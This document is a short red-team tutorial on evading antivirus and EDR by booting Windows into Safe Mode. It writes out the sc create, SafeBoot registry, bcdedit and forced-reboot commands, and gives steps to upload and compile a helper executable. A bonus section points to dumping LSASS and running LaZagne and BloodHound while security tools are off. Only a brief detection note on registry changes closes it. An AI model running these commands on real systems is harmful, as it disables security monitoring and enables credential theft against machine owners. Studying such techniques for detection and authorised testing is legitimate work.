Bypass AV/EDR using Safe Mode

Bypass AV/EDR using Safe Mode during your Red Teaming experiments.

Several pieces of malware are using EDR/AV in safe mode to execute the malicious code and evade detection.

Safe mode scripts

sc create CheckSafeMode binpath= "C:\Users\Public\CheckSafeMode.exe" type= own start= auto DisplayName= "CheckSafeMode"
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\CheckSafeMode"
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\CheckSafeMode" /f /v "Service"
bcdedit /set {current} safeboot Minimal
shutdown /r /f /t 00


Step by step

Initially, the scripts need to be uploaded into the target machine: C:\users\public

In short, the CheckSafeMode.cs script will try to identify the security AV/EDR, check if it is running, and put the machine in save mode and, restart the machine.

Here, how we can compile the CS file:

:> C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc CheckSafeMode.cs

After compiling the file, we need to run the DoIt.bat file as administration rights. This script will create the service and modify some registry keys that are essential to run the service in safe mode and boot it into safe mode.

As observed above, after add the registry keys the machine is rebooted. When it comes up, it runs the exe file we have compiled to check if the security tools are running, removes safeboot option and then restarts. It takes about 30 seconds to finish.

We got it! 😎

After it reboots out of safe mode, we can log back in and see the file it created with the output of the exe.

This lets us know about the security product and if it is running. The results below are for defender. EDR vendor results are much more interesting.

Removing safe mode service (house cleaning)

Finally, we can run undoit.bat to remove the service we have created and also remove the registry key.

Bonus: LSASS dump + LaZagne

Of course, we can use this technique to dump LSASS in safe mode, LaZagne, BloodHound ingestor and everything you want/need.

Detection / Defenses

Looking for changes in the registry:


Consider checking if the EDR runs in safe mode. If it doesn’t, check with your vendor to see what they recommend to detect this technique.


Last updated